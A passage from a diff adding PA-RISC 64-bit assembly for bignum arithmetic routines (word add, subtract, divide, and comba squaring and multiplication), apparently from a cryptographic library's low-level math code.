+	.EXPORT	bn_add_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+	.align 64
+
+    CMPIB,>= 0,n,bn_add_words_exit
+    COPY    %r0,%ret0           ; return 0 by default
+
+	;
+	; If 2 or more numbers do the loop
+	;
+	CMPIB,= 1,n,bn_add_words_single_top
+	NOP
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+bn_add_words_unroll2
+	LDD     0(a_ptr),t
+	LDD     0(b_ptr),b
+	ADD     t,%ret0,t                    ; t = t+c;
+	ADD,DC  %r0,%r0,%ret0                ; set c to carry
+	ADD     t,b,l                        ; l = t + b[0]
+	ADD,DC  %ret0,%r0,%ret0              ; c+= carry
+	STD     l,0(r_ptr)
+
+	LDD     8(a_ptr),t
+	LDD     8(b_ptr),b
+	ADD     t,%ret0,t                     ; t = t+c;
+	ADD,DC  %r0,%r0,%ret0                 ; set c to carry
+	ADD     t,b,l                         ; l = t + b[0]
+	ADD,DC  %ret0,%r0,%ret0               ; c+= carry
+	STD     l,8(r_ptr)
+
+	LDO     -2(n),n
+	LDO     16(a_ptr),a_ptr
+	LDO     16(b_ptr),b_ptr
+
+	CMPIB,<= 2,n,bn_add_words_unroll2
+	LDO     16(r_ptr),r_ptr
+
+    CMPIB,=,N 0,n,bn_add_words_exit ; are we done?
+
+bn_add_words_single_top
+	LDD     0(a_ptr),t
+	LDD     0(b_ptr),b
+
+	ADD     t,%ret0,t                 ; t = t+c;
+	ADD,DC  %r0,%r0,%ret0             ; set c to carry (could use CMPCLR??)
+	ADD     t,b,l                     ; l = t + b[0]
+	ADD,DC  %ret0,%r0,%ret0           ; c+= carry
+	STD     l,0(r_ptr)
+
+bn_add_words_exit
+    .EXIT
+    BVE     (%rp)
+	NOP
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;----------------------------------------------------------------------------
+;
+;BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+;
+; arg0 = rp 
+; arg1 = ap
+; arg2 = bp 
+; arg3 = n
+
+t1       .reg %r22
+t2       .reg %r21
+sub_tmp1 .reg %r20
+sub_tmp2 .reg %r19
+
+
+bn_sub_words
+	.proc
+	.callinfo 
+	.EXPORT	bn_sub_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    CMPIB,>=  0,n,bn_sub_words_exit
+    COPY    %r0,%ret0           ; return 0 by default
+
+	;
+	; If 2 or more numbers do the loop
+	;
+	CMPIB,= 1,n,bn_sub_words_single_top
+	NOP
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+bn_sub_words_unroll2
+	LDD     0(a_ptr),t1
+	LDD     0(b_ptr),t2
+	SUB     t1,t2,sub_tmp1           ; t3 = t1-t2; 
+	SUB     sub_tmp1,%ret0,sub_tmp1  ; t3 = t3- c; 
+
+	CMPCLR,*>> t1,t2,sub_tmp2        ; clear if t1 > t2
+	LDO      1(%r0),sub_tmp2
+	
+	CMPCLR,*= t1,t2,%r0
+	COPY    sub_tmp2,%ret0
+	STD     sub_tmp1,0(r_ptr)
+
+	LDD     8(a_ptr),t1
+	LDD     8(b_ptr),t2
+	SUB     t1,t2,sub_tmp1            ; t3 = t1-t2; 
+	SUB     sub_tmp1,%ret0,sub_tmp1   ; t3 = t3- c; 
+	CMPCLR,*>> t1,t2,sub_tmp2         ; clear if t1 > t2
+	LDO      1(%r0),sub_tmp2
+	
+	CMPCLR,*= t1,t2,%r0
+	COPY    sub_tmp2,%ret0
+	STD     sub_tmp1,8(r_ptr)
+
+	LDO     -2(n),n
+	LDO     16(a_ptr),a_ptr
+	LDO     16(b_ptr),b_ptr
+
+	CMPIB,<= 2,n,bn_sub_words_unroll2
+	LDO     16(r_ptr),r_ptr
+
+    CMPIB,=,N 0,n,bn_sub_words_exit ; are we done?
+
+bn_sub_words_single_top
+	LDD     0(a_ptr),t1
+	LDD     0(b_ptr),t2
+	SUB     t1,t2,sub_tmp1            ; t3 = t1-t2; 
+	SUB     sub_tmp1,%ret0,sub_tmp1   ; t3 = t3- c; 
+	CMPCLR,*>> t1,t2,sub_tmp2         ; clear if t1 > t2
+	LDO      1(%r0),sub_tmp2
+	
+	CMPCLR,*= t1,t2,%r0
+	COPY    sub_tmp2,%ret0
+
+	STD     sub_tmp1,0(r_ptr)
+
+bn_sub_words_exit
+    .EXIT
+    BVE     (%rp)
+	NOP
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;------------------------------------------------------------------------------
+;
+; unsigned long bn_div_words(unsigned long h, unsigned long l, unsigned long d)
+;
+; arg0 = h
+; arg1 = l
+; arg2 = d
+;
+; This is mainly just modified assembly from the compiler, thus the
+; lack of variable names.
+;
+;------------------------------------------------------------------------------
+bn_div_words
+	.proc
+	.callinfo CALLER,FRAME=272,ENTRY_GR=%r10,SAVE_RP,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_div_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+	.IMPORT	BN_num_bits_word,CODE,NO_RELOCATION
+	.IMPORT	__iob,DATA
+	.IMPORT	fprintf,CODE,NO_RELOCATION
+	.IMPORT	abort,CODE,NO_RELOCATION
+	.IMPORT	$$div2U,MILLICODE
+    .entry
+    STD     %r2,-16(%r30)   
+    STD,MA  %r3,352(%r30)   
+    STD     %r4,-344(%r30)  
+    STD     %r5,-336(%r30)  
+    STD     %r6,-328(%r30)  
+    STD     %r7,-320(%r30)  
+    STD     %r8,-312(%r30)  
+    STD     %r9,-304(%r30)  
+    STD     %r10,-296(%r30)
+
+    STD     %r27,-288(%r30)             ; save gp
+
+    COPY    %r24,%r3           ; save d 
+    COPY    %r26,%r4           ; save h (high 64-bits)
+    LDO      -1(%r0),%ret0     ; return -1 by default	
+
+    CMPB,*=  %r0,%arg2,$D3     ; if (d == 0)
+    COPY    %r25,%r5           ; save l (low 64-bits)
+
+    LDO     -48(%r30),%r29     ; create ap 
+    .CALL   ;in=26,29;out=28;
+    B,L     BN_num_bits_word,%r2 
+    COPY    %r3,%r26        
+    LDD     -288(%r30),%r27    ; restore gp 
+    LDI     64,%r21 
+
+    CMPB,=  %r21,%ret0,$00000012   ;if (i == 64) (forward) 
+    COPY    %ret0,%r24             ; i   
+    MTSARCM %r24    
+    DEPDI,Z -1,%sar,1,%r29  
+    CMPB,*<<,N %r29,%r4,bn_div_err_case ; if (h > 1<<i) (forward) 
+
+$00000012
+    SUBI    64,%r24,%r31                       ; i = 64 - i;
+    CMPCLR,*<< %r4,%r3,%r0                     ; if (h >= d)
+    SUB     %r4,%r3,%r4                        ; h -= d
+    CMPB,=  %r31,%r0,$0000001A                 ; if (i)
+    COPY    %r0,%r10                           ; ret = 0
+    MTSARCM %r31                               ; i to shift
+    DEPD,Z  %r3,%sar,64,%r3                    ; d <<= i;
+    SUBI    64,%r31,%r19                       ; 64 - i; redundent
+    MTSAR   %r19                               ; (64 -i) to shift
+    SHRPD   %r4,%r5,%sar,%r4                   ; l>> (64-i)
+    MTSARCM %r31                               ; i to shift
+    DEPD,Z  %r5,%sar,64,%r5                    ; l <<= i;
+
+$0000001A
+    DEPDI,Z -1,31,32,%r19                      
+    EXTRD,U %r3,31,32,%r6                      ; dh=(d&0xfff)>>32
+    EXTRD,U %r3,63,32,%r8                      ; dl = d&0xffffff
+    LDO     2(%r0),%r9
+    STD    %r3,-280(%r30)                      ; "d" to stack
+
+$0000001C
+    DEPDI,Z -1,63,32,%r29                      ; 
+    EXTRD,U %r4,31,32,%r31                     ; h >> 32
+    CMPB,*=,N  %r31,%r6,$D2     	       ; if ((h>>32) != dh)(forward) div
+    COPY    %r4,%r26       
+    EXTRD,U %r4,31,32,%r25 
+    COPY    %r6,%r24      
+    .CALL   ;in=23,24,25,26;out=20,21,22,28,29; (MILLICALL)
+    B,L     $$div2U,%r2     
+    EXTRD,U %r6,31,32,%r23  
+    DEPD    %r28,31,32,%r29 
+$D2
+    STD     %r29,-272(%r30)                   ; q
+    AND     %r5,%r19,%r24                   ; t & 0xffffffff00000000;
+    EXTRD,U %r24,31,32,%r24                 ; ??? 
+    FLDD    -272(%r30),%fr7                 ; q
+    FLDD    -280(%r30),%fr8                 ; d
+    XMPYU   %fr8L,%fr7L,%fr10  
+    FSTD    %fr10,-256(%r30)   
+    XMPYU   %fr8L,%fr7R,%fr22  
+    FSTD    %fr22,-264(%r30)   
+    XMPYU   %fr8R,%fr7L,%fr11 
+    XMPYU   %fr8R,%fr7R,%fr23
+    FSTD    %fr11,-232(%r30)
+    FSTD    %fr23,-240(%r30)
+    LDD     -256(%r30),%r28
+    DEPD,Z  %r28,31,32,%r2 
+    LDD     -264(%r30),%r20
+    ADD,L   %r20,%r2,%r31   
+    LDD     -232(%r30),%r22 
+    DEPD,Z  %r22,31,32,%r22 
+    LDD     -240(%r30),%r21 
+    B       $00000024       ; enter loop  
+    ADD,L   %r21,%r22,%r23 
+
+$0000002A
+    LDO     -1(%r29),%r29   
+    SUB     %r23,%r8,%r23   
+$00000024
+    SUB     %r4,%r31,%r25   
+    AND     %r25,%r19,%r26  
+    CMPB,*<>,N      %r0,%r26,$00000046  ; (forward)
+    DEPD,Z  %r25,31,32,%r20 
+    OR      %r20,%r24,%r21  
+    CMPB,*<<,N  %r21,%r23,$0000002A ;(backward) 
+    SUB     %r31,%r6,%r31   
+;-------------Break path---------------------
+
+$00000046
+    DEPD,Z  %r23,31,32,%r25              ;tl
+    EXTRD,U %r23,31,32,%r26              ;t
+    AND     %r25,%r19,%r24               ;tl = (tl<<32)&0xfffffff0000000L
+    ADD,L   %r31,%r26,%r31               ;th += t; 
+    CMPCLR,*>>=     %r5,%r24,%r0         ;if (l<tl)
+    LDO     1(%r31),%r31                 ; th++;
+    CMPB,*<<=,N     %r31,%r4,$00000036   ;if (n < th) (forward)
+    LDO     -1(%r29),%r29                ;q--; 
+    ADD,L   %r4,%r3,%r4                  ;h += d;
+$00000036
+    ADDIB,=,N       -1,%r9,$D1 ;if (--count == 0) break (forward) 
+    SUB     %r5,%r24,%r28                ; l -= tl;
+    SUB     %r4,%r31,%r24                ; h -= th;
+    SHRPD   %r24,%r28,32,%r4             ; h = ((h<<32)|(l>>32));
+    DEPD,Z  %r29,31,32,%r10              ; ret = q<<32
+    b      $0000001C
+    DEPD,Z  %r28,31,32,%r5               ; l = l << 32 
+
+$D1
+    OR      %r10,%r29,%r28           ; ret |= q
+$D3
+    LDD     -368(%r30),%r2  
+$D0
+    LDD     -296(%r30),%r10 
+    LDD     -304(%r30),%r9  
+    LDD     -312(%r30),%r8  
+    LDD     -320(%r30),%r7  
+    LDD     -328(%r30),%r6  
+    LDD     -336(%r30),%r5  
+    LDD     -344(%r30),%r4  
+    BVE     (%r2)   
+        .EXIT
+    LDD,MB  -352(%r30),%r3 
+
+bn_div_err_case
+    MFIA    %r6     
+    ADDIL   L'bn_div_words-bn_div_err_case,%r6,%r1 
+    LDO     R'bn_div_words-bn_div_err_case(%r1),%r6  
+    ADDIL   LT'__iob,%r27,%r1       
+    LDD     RT'__iob(%r1),%r26      
+    ADDIL   L'C$4-bn_div_words,%r6,%r1    
+    LDO     R'C$4-bn_div_words(%r1),%r25  
+    LDO     64(%r26),%r26   
+    .CALL           ;in=24,25,26,29;out=28;
+    B,L     fprintf,%r2    
+    LDO     -48(%r30),%r29 
+    LDD     -288(%r30),%r27
+    .CALL           ;in=29;
+    B,L     abort,%r2      
+    LDO     -48(%r30),%r29 
+    LDD     -288(%r30),%r27
+    B       $D0         
+    LDD     -368(%r30),%r2  
+	.PROCEND	;in=24,25,26,29;out=28;
+
+;----------------------------------------------------------------------------
+;
+; Registers to hold 64-bit values to manipulate.  The "L" part
+; of the register corresponds to the upper 32-bits, while the "R"
+; part corresponds to the lower 32-bits
+; 
+; Note, that when using b6 and b7, the code must save these before
+; using them because they are callee save registers 
+; 
+;
+; Floating point registers to use to save values that
+; are manipulated.  These don't collide with ftemp1-6 and
+; are all caller save registers
+;
+a0        .reg %fr22
+a0L       .reg %fr22L
+a0R       .reg %fr22R
+
+a1        .reg %fr23
+a1L       .reg %fr23L
+a1R       .reg %fr23R
+
+a2        .reg %fr24
+a2L       .reg %fr24L
+a2R       .reg %fr24R
+
+a3        .reg %fr25
+a3L       .reg %fr25L
+a3R       .reg %fr25R
+
+a4        .reg %fr26
+a4L       .reg %fr26L
+a4R       .reg %fr26R
+
+a5        .reg %fr27
+a5L       .reg %fr27L
+a5R       .reg %fr27R
+
+a6        .reg %fr28
+a6L       .reg %fr28L
+a6R       .reg %fr28R
+
+a7        .reg %fr29
+a7L       .reg %fr29L
+a7R       .reg %fr29R
+
+b0        .reg %fr30
+b0L       .reg %fr30L
+b0R       .reg %fr30R
+
+b1        .reg %fr31
+b1L       .reg %fr31L
+b1R       .reg %fr31R
+
+;
+; Temporary floating point variables, these are all caller save
+; registers
+;
+ftemp1    .reg %fr4
+ftemp2    .reg %fr5
+ftemp3    .reg %fr6
+ftemp4    .reg %fr7
+
+;
+; The B set of registers when used.
+;
+
+b2        .reg %fr8
+b2L       .reg %fr8L
+b2R       .reg %fr8R
+
+b3        .reg %fr9
+b3L       .reg %fr9L
+b3R       .reg %fr9R
+
+b4        .reg %fr10
+b4L       .reg %fr10L
+b4R       .reg %fr10R
+
+b5        .reg %fr11
+b5L       .reg %fr11L
+b5R       .reg %fr11R
+
+b6        .reg %fr12
+b6L       .reg %fr12L
+b6R       .reg %fr12R
+
+b7        .reg %fr13
+b7L       .reg %fr13L
+b7R       .reg %fr13R
+
+c1           .reg %r21   ; only reg
+temp1        .reg %r20   ; only reg
+temp2        .reg %r19   ; only reg
+temp3        .reg %r31   ; only reg
+
+m1           .reg %r28   
+c2           .reg %r23   
+high_one     .reg %r1
+ht           .reg %r6
+lt           .reg %r5
+m            .reg %r4
+c3           .reg %r3
+
+SQR_ADD_C  .macro  A0L,A0R,C1,C2,C3
+    XMPYU   A0L,A0R,ftemp1       ; m
+    FSTD    ftemp1,-24(%sp)      ; store m
+
+    XMPYU   A0R,A0R,ftemp2       ; lt
+    FSTD    ftemp2,-16(%sp)      ; store lt
+
+    XMPYU   A0L,A0L,ftemp3       ; ht
+    FSTD    ftemp3,-8(%sp)       ; store ht
+
+    LDD     -24(%sp),m           ; load m
+    AND     m,high_mask,temp2    ; m & Mask
+    DEPD,Z  m,30,31,temp3        ; m << 32+1
+    LDD     -16(%sp),lt          ; lt
+
+    LDD     -8(%sp),ht           ; ht
+    EXTRD,U temp2,32,33,temp1    ; temp1 = m&Mask >> 32-1
+    ADD     temp3,lt,lt          ; lt = lt+m
+    ADD,L   ht,temp1,ht          ; ht += temp1
+    ADD,DC  ht,%r0,ht            ; ht++
+
+    ADD     C1,lt,C1             ; c1=c1+lt
+    ADD,DC  ht,%r0,ht            ; ht++
+
+    ADD     C2,ht,C2             ; c2=c2+ht
+    ADD,DC  C3,%r0,C3            ; c3++
+.endm
+
+SQR_ADD_C2 .macro  A0L,A0R,A1L,A1R,C1,C2,C3
+    XMPYU   A0L,A1R,ftemp1          ; m1 = bl*ht
+    FSTD    ftemp1,-16(%sp)         ;
+    XMPYU   A0R,A1L,ftemp2          ; m = bh*lt
+    FSTD    ftemp2,-8(%sp)          ;
+    XMPYU   A0R,A1R,ftemp3          ; lt = bl*lt
+    FSTD    ftemp3,-32(%sp)
+    XMPYU   A0L,A1L,ftemp4          ; ht = bh*ht
+    FSTD    ftemp4,-24(%sp)         ;
+
+    LDD     -8(%sp),m               ; r21 = m
+    LDD     -16(%sp),m1             ; r19 = m1
+    ADD,L   m,m1,m                  ; m+m1
+
+    DEPD,Z  m,31,32,temp3           ; (m+m1<<32)
+    LDD     -24(%sp),ht             ; r24 = ht
+
+    CMPCLR,*>>= m,m1,%r0            ; if (m < m1)
+    ADD,L   ht,high_one,ht          ; ht+=high_one
+
+    EXTRD,U m,31,32,temp1           ; m >> 32
+    LDD     -32(%sp),lt             ; lt
+    ADD,L   ht,temp1,ht             ; ht+= m>>32
+    ADD     lt,temp3,lt             ; lt = lt+m1
+    ADD,DC  ht,%r0,ht               ; ht++
+
+    ADD     ht,ht,ht                ; ht=ht+ht;
+    ADD,DC  C3,%r0,C3               ; add in carry (c3++)
+
+    ADD     lt,lt,lt                ; lt=lt+lt;
+    ADD,DC  ht,%r0,ht               ; add in carry (ht++)
+
+    ADD     C1,lt,C1                ; c1=c1+lt
+    ADD,DC,*NUV ht,%r0,ht           ; add in carry (ht++)
+    LDO     1(C3),C3              ; bump c3 if overflow,nullify otherwise
+
+    ADD     C2,ht,C2                ; c2 = c2 + ht
+    ADD,DC  C3,%r0,C3             ; add in carry (c3++)
+.endm
+
+;
+;void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
+; arg0 = r_ptr
+; arg1 = a_ptr
+;
+
+bn_sqr_comba8
+	.PROC
+	.CALLINFO FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_sqr_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .ENTRY
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z -1,32,33,high_mask   ; Create Mask 0xffffffff80000000L
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD     0(a_ptr),a0       
+    FLDD     8(a_ptr),a1       
+    FLDD    16(a_ptr),a2       
+    FLDD    24(a_ptr),a3       
+    FLDD    32(a_ptr),a4       
+    FLDD    40(a_ptr),a5       
+    FLDD    48(a_ptr),a6       
+    FLDD    56(a_ptr),a7       
+
+	SQR_ADD_C a0L,a0R,c1,c2,c3
+	STD     c1,0(r_ptr)          ; r[0] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
+	STD     c2,8(r_ptr)          ; r[1] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a1L,a1R,c3,c1,c2
+	SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
+	STD     c3,16(r_ptr)            ; r[2] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
+	SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
+	STD     c1,24(r_ptr)           ; r[3] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C a2L,a2R,c2,c3,c1
+	SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
+	SQR_ADD_C2 a4L,a4R,a0L,a0R,c2,c3,c1
+	STD     c2,32(r_ptr)          ; r[4] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C2 a5L,a5R,a0L,a0R,c3,c1,c2
+	SQR_ADD_C2 a4L,a4R,a1L,a1R,c3,c1,c2
+	SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
+	STD     c3,40(r_ptr)          ; r[5] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C a3L,a3R,c1,c2,c3
+	SQR_ADD_C2 a4L,a4R,a2L,a2R,c1,c2,c3
+	SQR_ADD_C2 a5L,a5R,a1L,a1R,c1,c2,c3
+	SQR_ADD_C2 a6L,a6R,a0L,a0R,c1,c2,c3
+	STD     c1,48(r_ptr)          ; r[6] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a7L,a7R,a0L,a0R,c2,c3,c1
+	SQR_ADD_C2 a6L,a6R,a1L,a1R,c2,c3,c1
+	SQR_ADD_C2 a5L,a5R,a2L,a2R,c2,c3,c1
+	SQR_ADD_C2 a4L,a4R,a3L,a3R,c2,c3,c1
+	STD     c2,56(r_ptr)          ; r[7] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a4L,a4R,c3,c1,c2
+	SQR_ADD_C2 a5L,a5R,a3L,a3R,c3,c1,c2
+	SQR_ADD_C2 a6L,a6R,a2L,a2R,c3,c1,c2
+	SQR_ADD_C2 a7L,a7R,a1L,a1R,c3,c1,c2
+	STD     c3,64(r_ptr)          ; r[8] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C2 a7L,a7R,a2L,a2R,c1,c2,c3
+	SQR_ADD_C2 a6L,a6R,a3L,a3R,c1,c2,c3
+	SQR_ADD_C2 a5L,a5R,a4L,a4R,c1,c2,c3
+	STD     c1,72(r_ptr)          ; r[9] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C a5L,a5R,c2,c3,c1
+	SQR_ADD_C2 a6L,a6R,a4L,a4R,c2,c3,c1
+	SQR_ADD_C2 a7L,a7R,a3L,a3R,c2,c3,c1
+	STD     c2,80(r_ptr)          ; r[10] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C2 a7L,a7R,a4L,a4R,c3,c1,c2
+	SQR_ADD_C2 a6L,a6R,a5L,a5R,c3,c1,c2
+	STD     c3,88(r_ptr)          ; r[11] = c3;
+	COPY    %r0,c3
+	
+	SQR_ADD_C a6L,a6R,c1,c2,c3
+	SQR_ADD_C2 a7L,a7R,a5L,a5R,c1,c2,c3
+	STD     c1,96(r_ptr)          ; r[12] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a7L,a7R,a6L,a6R,c2,c3,c1
+	STD     c2,104(r_ptr)         ; r[13] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a7L,a7R,c3,c1,c2
+	STD     c3, 112(r_ptr)       ; r[14] = c3
+	STD     c1, 120(r_ptr)       ; r[15] = c1
+
+    .EXIT
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+;-----------------------------------------------------------------------------
+;
+;void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
+; arg0 = r_ptr
+; arg1 = a_ptr
+;
+
+bn_sqr_comba4
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_sqr_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z -1,32,33,high_mask   ; Create Mask 0xffffffff80000000L
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD     0(a_ptr),a0       
+    FLDD     8(a_ptr),a1       
+    FLDD    16(a_ptr),a2       
+    FLDD    24(a_ptr),a3       
+    FLDD    32(a_ptr),a4       
+    FLDD    40(a_ptr),a5       
+    FLDD    48(a_ptr),a6       
+    FLDD    56(a_ptr),a7       
+
+	SQR_ADD_C a0L,a0R,c1,c2,c3
+
+	STD     c1,0(r_ptr)          ; r[0] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
+
+	STD     c2,8(r_ptr)          ; r[1] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a1L,a1R,c3,c1,c2
+	SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
+
+	STD     c3,16(r_ptr)            ; r[2] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
+	SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
+
+	STD     c1,24(r_ptr)           ; r[3] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C a2L,a2R,c2,c3,c1
+	SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
+
+	STD     c2,32(r_ptr)           ; r[4] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
+	STD     c3,40(r_ptr)           ; r[5] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C a3L,a3R,c1,c2,c3
+	STD     c1,48(r_ptr)           ; r[6] = c1;
+	STD     c2,56(r_ptr)           ; r[7] = c2;
+
+    .EXIT
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+
+;---------------------------------------------------------------------------
+
+MUL_ADD_C  .macro  A0L,A0R,B0L,B0R,C1,C2,C3
+    XMPYU   A0L,B0R,ftemp1        ; m1 = bl*ht
+    FSTD    ftemp1,-16(%sp)       ;
+    XMPYU   A0R,B0L,ftemp2        ; m = bh*lt
+    FSTD    ftemp2,-8(%sp)        ;
+    XMPYU   A0R,B0R,ftemp3        ; lt = bl*lt
+    FSTD    ftemp3,-32(%sp)
+    XMPYU   A0L,B0L,ftemp4        ; ht = bh*ht
+    FSTD    ftemp4,-24(%sp)       ;
+
+    LDD     -8(%sp),m             ; r21 = m
+    LDD     -16(%sp),m1           ; r19 = m1
+    ADD,L   m,m1,m                ; m+m1
+
+    DEPD,Z  m,31,32,temp3         ; (m+m1<<32)
+    LDD     -24(%sp),ht           ; r24 = ht
+
+    CMPCLR,*>>= m,m1,%r0          ; if (m < m1)
+    ADD,L   ht,high_one,ht        ; ht+=high_one
+
+    EXTRD,U m,31,32,temp1         ; m >> 32
+    LDD     -32(%sp),lt           ; lt
+    ADD,L   ht,temp1,ht           ; ht+= m>>32
+    ADD     lt,temp3,lt           ; lt = lt+m1
+    ADD,DC  ht,%r0,ht             ; ht++
+
+    ADD     C1,lt,C1              ; c1=c1+lt
+    ADD,DC  ht,%r0,ht             ; bump c3 if overflow,nullify otherwise
+
+    ADD     C2,ht,C2              ; c2 = c2 + ht
+    ADD,DC  C3,%r0,C3             ; add in carry (c3++)
+.endm
+
+
+;
+;void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+; arg0 = r_ptr
+; arg1 = a_ptr
+; arg2 = b_ptr
+;
+
+bn_mul_comba8
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_mul_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+    FSTD    %fr12,32(%sp)       ; save r6
+    FSTD    %fr13,40(%sp)       ; save r7
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD      0(a_ptr),a0       
+    FLDD      8(a_ptr),a1       
+    FLDD     16(a_ptr),a2       
+    FLDD     24(a_ptr),a3       
+    FLDD     32(a_ptr),a4       
+    FLDD     40(a_ptr),a5       
+    FLDD     48(a_ptr),a6       
+    FLDD     56(a_ptr),a7       
+
+    FLDD      0(b_ptr),b0       
+    FLDD      8(b_ptr),b1       
+    FLDD     16(b_ptr),b2       
+    FLDD     24(b_ptr),b3       
+    FLDD     32(b_ptr),b4       
+    FLDD     40(b_ptr),b5       
+    FLDD     48(b_ptr),b6       
+    FLDD     56(b_ptr),b7       
+
+	MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
+	STD       c1,0(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
+	STD       c2,8(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
+	STD       c3,16(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
+	MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
+	STD       c1,24(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a4L,a4R,b0L,b0R,c2,c3,c1
+	MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
+	MUL_ADD_C a0L,a0R,b4L,b4R,c2,c3,c1
+	STD       c2,32(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a0L,a0R,b5L,b5R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b4L,b4R,c3,c1,c2
+	MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
+	MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
